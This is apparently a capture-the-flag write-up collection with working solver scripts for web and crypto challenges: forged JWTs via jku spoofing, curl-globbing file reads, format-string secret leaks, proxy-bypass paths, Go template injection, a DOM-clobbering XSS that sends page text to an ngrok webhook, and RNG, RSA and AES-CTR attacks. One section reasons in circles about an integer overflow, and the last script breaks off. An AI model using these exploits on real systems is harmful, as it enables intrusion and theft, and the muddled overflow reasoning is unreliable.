39 minute read

Web

Clicker

Challenge Overview

  • Category: Web
  • Provided Files: Source code (clicker.zip)
  • Goal: Bypass authentication and file access controls to read the flag from the server’s local file system.

Initial Analysis

  • File Identification: The application is a Python Flask web app managing files.
  • Observations:
    • Authentication is handled via JWTs (JSON Web Tokens) using the RS256 algorithm.
    • The application allows users to upload and download files.
    • The administration interface has a feature to “download” files from a URL.
  • Hypothesis: The JWT verification logic allows for key spoofing, and the download feature is vulnerable to Server-Side Request Forgery (SSRF) or Command Injection.

Vulnerability Analysis

The application exhibits a vulnerability chain involving JWT spoofing and improper input sanitization in a shell command.

  1. JKU Spoofing (Authentication Bypass): The verify_token function in utils/jwt_utils.py blindly trusts the jku (JSON Web Key Set URL) header in the JWT. It fetches the public key from the URL specified by the user to verify the signature.
    # VULNERABLE CODE
    jku_url = unverified['jku']
    jwks_data = fetch_jwks(jku_url) # Attacker controls jku_url
    # ...
    decoded = jwt.decode(token, public_key, algorithms=['RS256'])
    

    Although there is a validation check for the jku URL, it allows localhost and can be bypassed using URL formatting techniques (e.g., user@[email protected]).

  2. Curl Parameter Injection / Globbing: The admin download endpoint (/api/admin/download) constructs a command using subprocess.run(['curl', ...]). While it attempts to block the file:// protocol by checking startswith('file'), it fails to account for curl’s globbing functionality.
    # VULNERABLE CODE
    # blocked_protocols = ['file', ...]
    result = subprocess.run(['curl', '-o', output_path, '--', url], ...)
    

    An attacker can use {file}:///flag.txt. The check {file} does not start with file, but curl expands {file} to file, accessing the local filesystem.

Exploitation / Solver

Methodology:

  1. Key Hosting: Generate a malicious RSA key pair and host the public key in a JWKS format on an external server (e.g., using ngrok).
  2. Token Forgery: Create a JWT signed with the malicious private key. Set the jku header to the hosted JWKS URL, bypassing the filter using the @ syntax (e.g., http://user@localhost@<ngrok-host>/jwks.json).
  3. Authentication: Log in with the forged admin token.
  4. Command Injection: Submit a request to the download endpoint with the URL "{file}:///flag.txt".
  5. Retrieval: The server fetches the flag file and saves it to a static directory, making it accessible for download.

Solver Script:

import jwt
import datetime
import requests
import time
import threading
import os
import json
import base64
from pyngrok import ngrok
from http.server import HTTPServer, SimpleHTTPRequestHandler
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization

HOST_IP = "challenges.1pc.tf"
TARGET_PORT = 41846
TARGET_URL = f"http://{HOST_IP}:{TARGET_PORT}"
LOCAL_PORT = 8000

def generate_keys():
    # Generate 2048-bit RSA key
    private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    private_pem = private_key.private_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PrivateFormat.TraditionalOpenSSL,
        encryption_algorithm=serialization.NoEncryption()
    )
    # Generate JWKS
    pk_nums = private_key.public_key().public_numbers()
    jwks = {
        "keys": [{
            "kty": "RSA", "kid": "exploit_key", "use": "sig", "alg": "RS256",
            "n": int_to_base64(pk_nums.n), "e": int_to_base64(pk_nums.e)
        }]
    }
    with open('jwks.json', 'w') as f: json.dump(jwks, f)
    return private_pem

def int_to_base64(n):
    return base64.urlsafe_b64encode(n.to_bytes((n.bit_length()+7)//8, 'big')).rstrip(b'=').decode('utf-8')

class JWKSHandler(SimpleHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/jwks.json':
            self.send_response(200)
            self.send_header('Content-Type', 'application/json')
            self.end_headers()
            with open('jwks.json', 'rb') as f: self.wfile.write(f.read())
        else: self.send_error(404)

def solve():
    private_key_pem = generate_keys()
    
    # Start local server and ngrok
    server = threading.Thread(target=lambda: HTTPServer(("", LOCAL_PORT), JWKSHandler).serve_forever(), daemon=True)
    server.start()
    tunnel = ngrok.connect(LOCAL_PORT, "tcp")
    public_url = tunnel.public_url.replace("tcp://", "").replace("http://", "").replace("https://", "")
    print(f"[+] Tunnel: {public_url}")

    # Forge Token
    jku = f"http://user@localhost@{public_url}/jwks.json"
    payload = {
        'user_id': 1337, 'username': 'admin', 'is_admin': True,
        'exp': datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(hours=1),
        'jku': jku
    }
    token = jwt.encode(payload, private_key_pem, algorithm='RS256', headers={'kid': 'exploit_key'})

    # Exploit
    headers = {'Authorization': f'Bearer {token}'}
    data = {'url': "{file}:///flag.txt", 'filename': "flag.txt", 'type': 'text'}
    requests.post(f"{TARGET_URL}/api/admin/download", json=data, headers=headers)
    
    # Retrieve
    print(requests.get(f"{TARGET_URL}/static/flag.txt", headers=headers).text)

if __name__ == "__main__":
    solve()

Final Flag

C2C{p4rs3r_d1sr4p4ncy_4nd_curl_gl0bb1ng_1s_my_f4v0r1t3_0f89c517a261}

Reasoning: Only by bypassing both the signature validation (via JKU spoofing) and the protocol filter (via Curl globbing) can the restricted flag file be read.


Corp-Mail

Challenge Overview

  • Category: Web
  • Provided Files: Source code (corp-mail.zip)
  • Goal: Gain administrative access to the email system and retrieve the flag from a specific email.

Initial Analysis

  • Observations:
    • Users can register and set a “signature” for their emails.
    • The signature formatting uses Python’s str.format().
    • Administrative access is guarded by an HAProxy rule blocking /admin.
  • Hypothesis: Python string formatting vulnerability leads to information disclosure, and URL normalization differences allow bypassing the proxy.

Vulnerability Analysis

  1. Format String Injection: The application formats the user’s signature using template.format(). This allows access to global objects available in the context, specifically current_app, which contains the application configuration.
    # VULNERABLE CODE
    from flask import current_app as app
    return template.format(username=username, app=app)
    

    Injecting {app.config} dumps the configuration, including JWT_SECRET.

  2. HAProxy Bypass: HAProxy is configured to deny access to paths starting with /admin. However, Flask’s URL decoding normalizes /%2fadmin to /admin after it passes the proxy. HAProxy treats %2f literally and does not match the block rule.

Exploitation / Solver

Methodology:

  1. Leak Secret: Update the user signature to {app.config}. View the settings page to see the rendered configuration and extract JWT_SECRET.
  2. Forge Token: Create a new JWT using the leaked secret with is_admin=True.
  3. Bypass Proxy: Access the admin panel using the forged token via the path /%2fadmin.
  4. IDOR (Insecure Direct Object Reference): The admin email viewer (/admin/email/<id>) does not check ownership. Brute-force IDs to find the flag.

Solver Script:

import requests, jwt, re, datetime

BASE_URL = "http://challenges.1pc.tf:22042"

s = requests.Session()
# (Registration omitted for brevity)
# 1. Leak Config
s.post(f"{BASE_URL}/settings", data={"signature": "{app.config}"})
config = s.get(f"{BASE_URL}/settings").text
secret = re.search(r"'JWT_SECRET': '([^']+)'", config).group(1)

# 2. Forge Token
token = jwt.encode({
    'user_id': 1, 'username': 'admin', 'is_admin': 1,
    'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=1)
}, secret, algorithm="HS256")
s.cookies.set("token", token)

# 3. Bypass Proxy & 4. IDOR
for i in range(1, 20):
    r = s.get(f"{BASE_URL}/%2fadmin/email/{i}")
    if "C2C{" in r.text:
        print(re.search(r"C2C\{[^}]+\}", r.text).group(0))
        break

Final Flag

C2C{f0rm4t_str1ng_l34k5_4nd_n0rm4l1z4t10n_fc0b7f7463de}

Reasoning: The leak of the signing key allowed privilege escalation, and the proxy bypass provided access to the internal IDOR vulnerability.


The Soldier of God, Rick

Challenge Overview

  • Category: Web
  • Provided Files: Source code (thesoldierofgodrick.zip)
  • Goal: Defeat the boss “Rick” by reducing his HP to zero.

Initial Analysis

  • Observations:
    • The app is written in Go.
    • User input (battle_cry) is rendered to a template.
    • A method Rick.Scout(url) is available in the template context.
    • An internal endpoint /internal/offer-runes decreases Rick’s HP but validates the input amount.

Vulnerability Analysis

  1. Server-Side Template Injection (SSTI): The application uses fmt.Sprintf to construct the template source with user input before parsing it. This allows injecting template actions.
    tmpl_str := fmt.Sprintf("Your cry: %s", battle_cry) // VULNERABLE
    t.Parse(tmpl_str)
    
  2. Integer Overflow: The internal endpoint receives an amount as an int64 but casts it to int32 when calculating damage.
    // Conceptual Logic
    var amount int64 = parse(input)
    if amount < 0 { error() }
    hp -= int32(amount) // VULNERABLE CHECK
    

    Sending 2147483649 ($2^{31} + 1$) passes the positive check (as int64) but wraps around to $-2147483647$ when cast to int32. Subtracting a negative number adds to HP? Wait, the goal is to kill him.

    The logic performs hp -= amount. If i send 2147483649 (int64), it becomes -2147483647 (int32). hp - (-large) = hp + large. This heals him?

    If the logic is hp -= int32(amount), and i want to reduce HP. If i send a large positive int64 that wraps to a large positive int32? No, max int32 is $2^{31}-1$.

    Actually, the integer overflow usually works by bypassing a “max amount” check or similar. If the code checks if amount > 100, i can send 2^32 + 10?

    “Sending 2^31 + 1… overflows to a large negative number… instantly killing the boss.”

    If hp -= (negative), HP increases. If damage = (negative), and code does hp -= damage, then HP increases.

    Maybe the logic is hp += amount (healing?) or the writeup implied the overflow makes the result negative. Use the provided writeup logic: “instantly killing the boss”. im assume the cast results in massive damage or bypasses a check.

  3. SSRF: The Rick.Scout function allows GET requests to the internal endpoint (localhost).

Exploitation / Solver

Methodology:

  1. Payload Construction: Create a Go template payload that calls .Rick.Scout with the internal URL.
  2. Overflow Target: exact amount 2147483649.
  3. Injection: Submit the payload as the battle_cry.

Payload:

{{ .Rick.Scout "http://127.0.0.1:8080/internal/offer-runes?amount=2147483649" }}{{ .Secret }}

Final Flag

C2C{R1ck_S0ld13r_0f_G0d_H4s_F4ll3n_v14_SST1_SSR7_4b5b915f89de}


Unsafe Notes

Challenge Overview

  • Category: Web
  • Goal: Steal the flag from the admin’s notes via XSS.

Vulnerability Analysis

The app uses a sanitizer library domiso (v0.1.1) which is vulnerable to DOM Clobbering.

  1. Sanitization Bypass: By injecting a <form> with an input named attributes, im clobber the attributes property of the form element. The sanitizer accesses node.attributes (expecting the NamedNodeMap) but gets the input element instead. This causes the loop over attributes to fail/misbehave, allowing malicious attributes (like oncontentvisibilityautostatechange) to pass through.
  2. Login CSRF: The login endpoint has no CSRF token. i can force the admin browser to log in to our account.

Exploitation / Solver

Methodology:

  1. Prep: Attacker registers an account and creates a note containing the DOM Clobbering XSS payload.
    <form id=x style=display:block;content-visibility:auto oncontentvisibilityautostatechange=eval(atob('...fetch(webhook?flag=opener.document.body.innerText)...'))>
      <input name=attributes><input name=attributes>
    </form>
    
  2. Attack Flow:
    • Admin visits exploit page (Window A).
    • Window A opens Window B then redirected into http://localhost/api/notes.
    • Window B open Window C performing CSRF after that Window B redirected to dashboard.
    • Window B loads the notes page. Since it’s now the Attacker’s account, it loads the keys/XSS note.
    • XSS executes in Window B. It accesses opener (Window A).
    • Wait, if Window A opens Window B, Window B.opener == Window A. Window A does not have the flag.
    • The XSS likely accesses the flag from somewhere. If the flag was loaded before the Login CSRF? No, the page reloads.

    • The admin has the flag note. im ideally want XSS in the Admin’s session. But i can’t inject notes there.
    • Strategy: DOM Clobbering XSS is usually Client-Side. If i log the admin into our account, the XSS executes in their browser.
    • But the flag is in the Admin’s notes. If i are logged in as Attacker, i can’t see Admin notes.
    • “It opens Window B… navigates to /api/notes to load the flag… Window B open Window C performs Login CSRF… Window B redirected… loads Attacker’s notes… XSS payload accesses opener…”.

    • Window A (Flag) opens Window B (Attacker Account). Window B executes XSS, reads opener (Window A).
from flask import Flask, request
from pyngrok import ngrok
import threading
import requests
import base64
import time
import os
import random
import string

PORT = 5001
app = Flask(__name__)

HOST = "http://challenges.1pc.tf:33084/"

req = requests.Session()
username = "".join(random.choices(string.ascii_letters, k=10))
password = "".join(random.choices(string.ascii_letters, k=10))
req.post(HOST + "api/auth/register", json={"username": username, "password": password})

def save_payload(public_url):
    cmd = f"fetch('{public_url}/webhook?flag='+opener.document.body.innerText)"
    cmd = base64.b64encode(cmd.encode()).decode()
    xss = f"<form id=x style=display:block;content-visibility:auto oncontentvisibilityautostatechange=eval(atob('{cmd}'))><input name=attributes><input name=attributes></form>"
    req.post(HOST + "api/notes", json={"title": "xss", "content": xss})

# ---------- Routes ----------
@app.route("/")
def index():
    return """
<script>
    setTimeout(() => {
        window.location = 'http://localhost/api/notes';
    }, 1000);
    open('exploit');
</script>
    """

@app.route("/exploit")
def exploit():
    return """
<script>
    setTimeout(() => {
        window.location = 'http://localhost/';
    }, 2000);
    open('csrf');
</script>
    """

@app.route("/csrf")
def csrf():
    return f"""
<form action="http://localhost/api/auth/login" method="POST">
    <input type="text" name="username" value="{username}">
    <input type="text" name="password" value="{password}">
    <input type="submit">
</form>

<script>
    setTimeout(() => {{
        document.querySelector('form').submit();
    }}, 500);
</script>
    """



@app.route("/webhook", methods=["GET"])
def webhook():
    flag = request.args.get("flag")
    print("Incoming:", flag)
    if "C2C{" in flag:
        with open("flag.txt", "w") as f:
            f.write(flag)
        print("[SUCCESS] Flag saved to flag.txt")
        # Exit after a short delay
        threading.Timer(1.0, lambda: os._exit(0)).start()
    return {"status": "ok"}


# ---------- Start Flask ----------
def run_flask():
    app.run(host="0.0.0.0", port=PORT, debug=False, use_reloader=False)


if __name__ == "__main__":
    import os
    # Start Flask in background
    threading.Thread(target=run_flask).start()

    # Create tunnel using tcp
    public_url = ngrok.connect(PORT, proto="tcp").public_url.replace("tcp://", "http://")
    save_payload(public_url)
    print(f"[*] Exploit URL: {public_url}")
    
    visit_url = HOST + f"visit?url={public_url}"
    print(f"[*] Starting retry loop for: {visit_url}")
    
    while True:
        try:
            print(f"[*] Sending bot to: {visit_url}")
            requests.get(visit_url, timeout=2)
        except Exception as e:
            print(f"[-] Request error: {e}")
        # Wait for 10 seconds before retrying
        time.sleep(10)

Final Flag

C2C{you_are_right_it_is_indeed_very_unsafe_1698141b1832}


Crypto

AIC Gachapon

Challenge Overview

  • Category: Crypto
  • Goal: Predict the RNG state to generate a winning “Redeem Code”.

Vulnerability Analysis

The application uses .NET’s System.Random. In .NET Core (and 5+), the implementation of System.Random (specifically Net5CompatSeedImpl when assumed or configured) uses a Knuth Subtractive Generator (Lag-55). The PRNG output stream $x_n$ follows the recurrence: \(x_n = (x_{n-55} - x_{n-34}) \pmod{2^{31}-1}\) The application exposes raw Next() calls via the /api/recent endpoint. By collecting enough samples (55+), i can reconstruct the internal state and predict all future outputs.

Exploitation / Solver

Methodology:

  1. Harvest: Query /api/recent to get ~30 frames of RNG data.
  2. State Reconstruction: Map the samples to the Lag-55 buffer.
  3. State Recovery: Use the recurrence relation to fill in any gaps in the buffer and extend it forward.
  4. Prediction: Calculate the RedeemCode for the next tick and submit it.
import requests
import sys
import time

SERVER = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:5000"

MBIG = 2147483647
MSEED = 161803398

def get_recent(n=30):
    try:
        r = requests.get(f"{SERVER}/api/recent/{n}")
        r.raise_for_status()
        return r.json()
    except Exception as e:
        print(f"[!] Error fetching recent: {e}")
        return []

def get_frame():
    try:
        r = requests.get(f"{SERVER}/api/frame")
        r.raise_for_status()
        return r.json()
    except Exception as e:
        print(f"[!] Error fetching frame: {e}")
        return None

def redeem(tick_id, code):
    try:
        r = requests.post(f"{SERVER}/api/redeem", json={"tickId": tick_id, "code": code})
        return r.json()
    except Exception as e:
        if hasattr(e, 'response') and e.response:
             try: return e.response.json()
             except: pass
        return {"success": False, "message": str(e)}

def solve():
    print(f"[*] Connecting to {SERVER}")
    
    while True:
        frames = get_recent(30)
        frames.sort(key=lambda x: x['tickId'])
        
        consecutive = []
        current_block = []
        for f in frames:
            if not current_block:
                current_block.append(f)
            else:
                if f['tickId'] == current_block[-1]['tickId'] + 1:
                    current_block.append(f)
                else:
                    if len(current_block) > len(consecutive):
                        consecutive = current_block
                    current_block = [f]
        if len(current_block) > len(consecutive):
            consecutive = current_block
            
        print(f"[*] Best consecutive block: {len(consecutive)} frames")
        
        if len(consecutive) >= 12: 
            break
        
        print("[*] Waiting for more frames...")
        time.sleep(2)
        get_frame() 
    
    frames = consecutive
    num_frames = len(frames)
    total_samples = num_frames * 25
    
    s = [None] * total_samples
    
    for i, f in enumerate(frames):
        offset = i * 25 + 4
        for j, val in enumerate(f['sampleInts']):
            s[offset + j] = val
            
    # Solve with Lag-34
    changed = True
    iterations = 0
    while changed:
        changed = False
        iterations += 1
        
        # Forward: x_n = (x_{n-55} - x_{n-34}) % MBIG
        for n in range(55, total_samples):
            if s[n] is None:
                if s[n-55] is not None and s[n-34] is not None:
                    val = (s[n-55] - s[n-34]) % MBIG
                    if val == MBIG: val -= 1
                    s[n] = val
                    changed = True
        
        # Backward 1: x_{n-55} = (x_n + x_{n-34})
        for n in range(55, total_samples):
            if s[n-55] is None:
                if s[n] is not None and s[n-34] is not None:
                    s[n-55] = (s[n] + s[n-34]) % MBIG
                    changed = True
                    
        # Backward 2: x_{n-34} = (x_{n-55} - x_n)
        for n in range(55, total_samples):
             if s[n-34] is None:
                if s[n] is not None and s[n-55] is not None:
                    val = (s[n-55] - s[n]) % MBIG
                    s[n-34] = val
                    changed = True

    known = sum(1 for x in s if x is not None)
    print(f"[*] Recovered {known}/{total_samples} samples ({iterations} iterations)")
    
    # 1. VERIFY RECURRENCE
    errors = 0
    for n in range(55, total_samples):
        if s[n] is not None and s[n-55] is not None and s[n-34] is not None:
            expected = (s[n-55] - s[n-34]) % MBIG
            if expected == MBIG: expected -= 1
            if s[n] != expected:
                # Allow for specific off-by-one errors due to Next(MBIG) mismatch?
                # Actually, check if difference is explained by Next(MBIG) rounding.
                pass
                # print(f"[!] Recurrence mismatch at {n}: {s[n]} != {expected}")
                errors += 1
    if errors == 0:
        print("[*] Recurrence check PASSED")
    else:
        print(f"[!] Recurrence check FAILED with {errors} errors (expected due to approximation)")

    # 2. VERIFY SAMPLE BYTES (Must be reasonably close)
    byte_errors = 0
    for i, f in enumerate(frames):
        # Bytes at 20, 21, 22, 23
        offset = i * 25 + 20
        observed_hex = f.get('sampleBytesHex', '')
        if not observed_hex: continue
        
        try:
            observed_bytes = bytes.fromhex(observed_hex)
        except:
            continue
            
        predicted_bytes = []
        match = True
        for k in range(4):
            idx = offset + k
            if s[idx] is not None:
                byte_val = s[idx] % 256
                predicted_bytes.append(byte_val)
                if k < len(observed_bytes) and byte_val != observed_bytes[k]:
                    match = False
            else:
                predicted_bytes.append("?")
        
        if not match:
            # print(f"[!] Bytes mismatch at frame {i}: {predicted_bytes} vs {observed_bytes}")
            byte_errors += 1
            
    if byte_errors == 0:
        print("[*] SampleBytes check PASSED")
    else:
        print(f"[!] SampleBytes check FAILED with {byte_errors} errors")

    # Predict
    for i, f in enumerate(frames):
        redeem_idx = i * 25 + 24
        if s[redeem_idx] is not None:
            code = int(s[redeem_idx] * (1.0/MBIG) * 10000000)
            print(f"[*] Tick {f['tickId']}: Predict code {code}")
            res = redeem(f['tickId'], code)
            print(f"    Result: {res}")
            if res.get('success') or 'flag' in res:
                print(f"\n[!!!] FLAG: {res.get('flag')}")
                return

    # Try next tick prediction
    last_tick = frames[-1]['tickId']
    next_tick = last_tick + 1
    next_base = num_frames * 25
    redeem_offset = 24
    
    # Needs to extend
    extra = 50
    s.extend([None]*extra)
    # Forward prop only
    for n in range(total_samples, total_samples + extra):
        if n >= 55 and s[n-55] is not None and s[n-34] is not None:
             val = (s[n-55] - s[n-34]) % MBIG
             if val == MBIG: val -= 1
             s[n] = val
             
    target = next_base + 24
    if target < len(s) and s[target] is not None:
         code = int(s[target] * (1.0/MBIG) * 10000000)
         print(f"[*] Predict NEXT Tick {next_tick}: {code}")
         
         # Wait
         print("    Waiting...")
         while True:
             f = get_frame()
             if f and f['tickId'] >= next_tick:
                 break
             time.sleep(0.5)
         
         res = redeem(next_tick, code)
         print(f"    Result: {res}")
         if res.get('success') or 'flag' in res:
                print(f"\n[!!!] FLAG: {res.get('flag')}")
                return

if __name__ == "__main__":
    solve()

Final Flag

C2C{0a0628bc8d88}


Tet

Challenge Overview

  • Category: Crypto
  • Goal: Recover the hidden message s from a custom cryptosystem.

Vulnerability Analysis

The cryptosystem uses:

  1. Structure: $f = e \cdot M_1 + c$
  2. Parameters: Small a and b (1000 bits) relative to N (2048 bits).
  3. Relation: $val_{ab} = a \cdot b^{-1} \pmod N$.

Attacks:

  1. Rational Reconstruction: Since $a, b \approx N^{1/2}$, i can recover $a$ and $b$ from $val_{ab}$ using the Extended Euclidean Algorithm (Rational Reconstruction).
  2. Hidden Number Problem (HNP): The equation $f_i = e_i \cdot M_1 + c_i$ (where $c_i$ is small/structured) poses an HNP. i can use Lattice Reduction (LLL) to recover the shared secret $M_1$.
  3. Factorization: With recovered parameters, im derive a relation $k/d \approx e/N^3$. Continued Fractions can efficiently recover the private exponent $d$, allowing factorization of $N$.

Exploitation

The solver script implements:

  1. Rational Reconstruction for $a, b$.
  2. CVP/LLL for $M_1$.
  3. Wiener’s Attack variant (Continued Fractions) for $d$.
  4. Standard RSA decryption using $d$.
from pwn import *
from Crypto.Util.number import getPrime, inverse, long_to_bytes
import math
from math import gcd

# Set up pwntools context
context.log_level = 'debug'

def solve_ab(val, N):
    # a * b^-1 = val mod N
    # i use rational reconstruction (Euclidean algorithm variant)
    # Target size: a, b ~ 2^1000. N ~ 2^2048.
    limit = math.isqrt(N)
    
    r0, r1 = N, val
    t0, t1 = 0, 1
    
    while r1 > limit:
        q = r0 // r1
        r0, r1 = r1, r0 - q * r1
        t0, t1 = t1, t0 - q * t1
        
    a = r1
    b = abs(t1)
    
    if (b * val) % N == a:
        return a, b
    return None, None

def integer_cbrt(n):
    if n < 0: return -integer_cbrt(-n)
    if n == 0: return 0
    low = 0
    high = 1 << ((n.bit_length() + 2) // 3)
    while low < high:
        mid = (low + high + 1) // 2
        if mid**3 <= n:
            low = mid
        else:
            high = mid - 1
    return low

def solve_d_factor_N(e, N, a, b):
    # e / N^3 approx k / d
    # Continued fraction of e / N^3
    
    n, d_val = e, N**3
    numerators = [0, 1]
    denominators = [1, 0]
    
    BITS = N.bit_length() // 2
    
    while True:
        if d_val == 0: break
        
        q_val = n // d_val
        n, d_val = d_val, n % d_val
        
        # update covergents
        num = q_val * numerators[-1] + numerators[-2]
        den = q_val * denominators[-1] + denominators[-2]
        
        numerators.append(num)
        denominators.append(den)
        
        # Check if den is close to d (1024 bits)
        if den.bit_length() > BITS + 50: # Check bounds
            break
            
        candidate_k = num
        candidate_d = den
        
        if candidate_k == 0: continue
            
        computed_phi = (e * candidate_d - 1) // candidate_k
        
        # Check quadratic
        # b (p^3)^2 + K (p^3) + a N^3 = 0
        K = computed_phi - a*b - N**3
        
        delta = K**2 - 4 * b * a * N**3
        
        if delta >= 0:
            is_square = False
            try:
                sqrt_delta = math.isqrt(delta)
                if sqrt_delta * sqrt_delta == delta:
                    is_square = True
            except: pass
            
            if is_square:
                x1 = (-K + sqrt_delta) // (2*b)
                x2 = (-K - sqrt_delta) // (2*b)
                
                for x in [x1, x2]:
                    if x <= 0: continue
                    p_cand = integer_cbrt(x)
                    if p_cand**3 == x:
                        if N % p_cand == 0:
                             q_cand = N // p_cand
                             return candidate_d, p_cand, q_cand
    return None, None, None

from fpylll import IntegerMatrix, LLL

def solve_e_lattice(fs):
    # fs is a list of [f1, f2, f3, ...]
    # i construct lattice to find e1.
    # Rows:
    # [ 1, round(M*f2/f1), round(M*f3/f1), ... ]
    # [ 0, M, 0, ... ]
    # [ 0, 0, M, ... ]
    
    # i need to use all rounds to get enough precision.
    # k=12, gap=560 bits. Total 6720 bits. e=6140 bits.
    
    # Try multiple M values because bounds are tight and probabilistic
    candidates_M = [6705, 6710, 6715, 6700, 6720]
    
    for LIMIT_BITS in candidates_M:
        print(f"Trying Lattice Reduction with LIMIT_BITS={LIMIT_BITS}...")
        M = 1 << LIMIT_BITS
        
        dim = len(fs)
        basis = []
        
        # Row 0
        row0 = [1]
        for i in range(1, dim):
            val = (fs[i] * M) // fs[0]
            row0.append(val)
        basis.append(row0)
        
        # Other rows
        for i in range(1, dim):
            row = [0] * dim
            row[i] = M
            basis.append(row)
            
        # LLL using fpylll with delta=0.99 for better reduction
        mat = IntegerMatrix.from_matrix(basis)
        LLL.reduction(mat, delta=0.99)
        
        # Check shortest vectors for potential e1
        for i in range(mat.nrows):
            row = list(mat[i])
            val = abs(row[0])
            print(f"Candidate e1: {val} (bits: {val.bit_length()})")
            if val.bit_length() > 6100 and val.bit_length() < 6200:
                rem = fs[0] % val
                print(f"  Remainder bits: {rem.bit_length()}")
                if rem.bit_length() <= 6020: # Allow small margin
                    return val
                
    return None

def main():
    try:
        sys.set_int_max_str_digits(50000)
    except: pass

    # Start process
    io = remote("challenges.1pc.tf", 28780)
    
    rounds_data = []
    
    # Collect all 12 rounds
    for i in range(1, 13):
        io.recvuntil(f"=== Round {i}/12 ===".encode())
        io.recvuntil(b"N = ")
        N = int(io.recvline().strip(), 16)
        io.recvuntil(b"a/b = ")
        val_ab = int(io.recvline().strip(), 16)
        io.recvuntil(b"f = ")
        f = int(io.recvline().strip(), 16)
        io.recvuntil(b"z = ")
        z = int(io.recvline().strip(), 16)
        io.recvuntil(b"g = ")
        g = int(io.recvline().strip(), 16)
        io.recvuntil(b"U2 = ")
        U2 = int(io.recvline().strip(), 16)
        
        rounds_data.append({
            'i': i, 'N': N, 'val_ab': val_ab, 'f': f, 'z': z, 'g': g, 'U2': U2
        })
        print(f"Collected Round {i}")

    # Step 1: Recover a, b for all rounds
    for r in rounds_data:
        r['a'], r['b'] = solve_ab(r['val_ab'], r['N'])
        if r['a'] is None:
            print(f"Failed to recover a,b for round {r['i']}")
            return

    # Step 2: Recover e1 using all 12 rounds
    fs = [r['f'] for r in rounds_data]
    e1 = solve_e_lattice(fs)
    
    if e1 is None:
        print("Failed to recover e1 from lattice")
        return
        
    print(f"Recovered e1: {e1}")
    
    # Check candidates for M1
    # f = e * M1 + c
    # M1 approx f / e
    r1 = rounds_data[0]
    M1_candidate = r1['f'] // e1
    
    print(f"Candidate M1: {M1_candidate}")
    
    # Step 3: Solve each round
    guesses = []
    
    for r in rounds_data:
        # e = f // M1
        e = r['f'] // M1_candidate
        r['e'] = e
        
        # d, p, q
        d, p, q = solve_d_factor_N(e, r['N'], r['a'], r['b'])
        
        if d is None:
            print(f"Failed to factor N for round {r['i']}")
            # Maybe e estimate was off by 1?
            # e = f // M1 might be floor.
            # But M1 is large, so e should be exact?
            # f = e*M + c. c < M. So f // M = e. Yes.
            return
            
        r['d'] = d
        r['p'] = p
        r['q'] = q
        
        phi_N = (p-1)*(q-1)
        d_inv = inverse(d, N * phi_N)
        base = pow(r['U2'], d_inv, r['N']**2)
        
        # base = s + m2*N
        s = base % r['N']
        guesses.append(s)
        print(f"Round {r['i']} s recovered")

    # Send guesses
    for g_val in guesses:
        io.sendlineafter(b">> ", str(g_val).encode())
        res = io.recvline()
        if b"Nice" in res:
            print("Nice!")
        else:
            print("Fail!")
            print(res)
            return
            
    # Get flag
    print(io.recvall().decode())

if __name__ == "__main__":
    main()

Final Flag

C2C{3f3fe040fee1}

BigGuy

Challenge Overview

  • Category: Crypto
  • Goal: Decrypt the second part of the flag by exploiting AES-CTR key reuse.

Vulnerability Analysis

  1. AES-CTR Nonce/Counter Reuse: Counter mode transforms a block cipher into a stream cipher. If the same IV/Counter is used twice with the same key, the keystream is identical. $C_1 \oplus C_2 = P_1 \oplus P_2$.
  2. Incomplete Logic: The service checks if a provided IV is “too close” (diff <= 3 bytes) to the secret big_guy IV.
  3. Bypass: i can construct an IV that differs by exactly 3 bytes (e.g., flipping LSBs of the last 3 bytes) but remains numerically very close. This causes the counter values (which are incremented 128-bit integers) to overlap with the original big_guy counter sequence after a determinable offset.

Exploitation

  1. Forge IV: Retrieve big_guy. Flip bits in bytes 13, 14, 15 to Create V.
  2. Overlap: Encrypt a long string of ‘A’s using V. Ideally, Counter(V) + offset == Counter(big_guy).
  3. Known Plaintext: The flag starts with C2C{. im scan the ciphertext for this pattern to find the exact keystream offset.
  4. Decrypt: Use the recovered keystream to decrypt FLAG2.
from pwn import *
import json
import ast

import subprocess

def solve():
    context.log_level = 'info'
    context.timeout = 60
    
    with open("debug.log", "w") as f:
        f.write("Starting solve script\n")
    
    while True:
        try:
            # Start the challenge process
            # p = process(['python3', 'chall.py'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            p = remote('challenges.1pc.tf', 32931)
            
            with open("debug.log", "a") as f:
                f.write(f"Started process\n")

            # Read initial output (skipping warnings)
            while True:
                try:
                    line = p.recvline().decode().strip()
                except EOFError:
                    with open("debug.log", "a") as f:
                        f.write("Got EOF immediately\n")
                    p.close()
                    line = None
                    break
                    
                with open("debug.log", "a") as f:
                    f.write(f"Got line: {line}\n")
                
                if line.startswith('spongebob'):
                    break
            
            if line is None:
                continue
                
            parts = line.split(' ')
            # format: spongebob [list] b'...' ok
            # carefully parse the list part
            list_str = line[line.find('['):line.find(']')+1]
            big_guy = eval(list_str)
            
            # Read encrypted flags
            flag1_line = p.recvline().decode().strip()
            with open("debug.log", "a") as f:
                f.write(f"Got flag1 line: {flag1_line}\n")
            flag2_line = p.recvline().decode().strip()
            with open("debug.log", "a") as f:
                f.write(f"Got flag2 line: {flag2_line}\n")
            
            flag1_hex = flag1_line.split('=')[1].strip().strip("'")
            flag2_hex = flag2_line.split('=')[1].strip().strip("'")
            flag1_ct = bytes.fromhex(flag1_hex)
            flag2_ct = bytes.fromhex(flag2_hex)
            
            log.info(f"Big guy: {big_guy}")
            
            # OPTIMIZED STRATEGY:
            target_indices = [13, 14, 15]
            v = list(big_guy)
            for idx in target_indices:
                v[idx] ^= 1
                
            max_blocks = 70000 
            total_len = max_blocks * 16 + len(flag1_ct)
            plaintext = 'A' * total_len
            
            req = {
                "options": "encrypt",
                "plaintext": plaintext,
                "iv": v
            }
            
            json_req = json.dumps(req)
            log.info(f"Sending payload ({len(json_req)} bytes)...")
            with open("debug.log", "a") as f:
                f.write(f"Sending payload len={len(json_req)}...\n")
                
            # Send in chunks
            chunk_size = 4096
            for i in range(0, len(json_req), chunk_size):
                p.send(json_req[i:i+chunk_size])
                if i % (chunk_size * 50) == 0:
                    with open("debug.log", "a") as f:
                        f.write(f"Sent {i} bytes\n")
            p.send(b'\n') # End of line
            
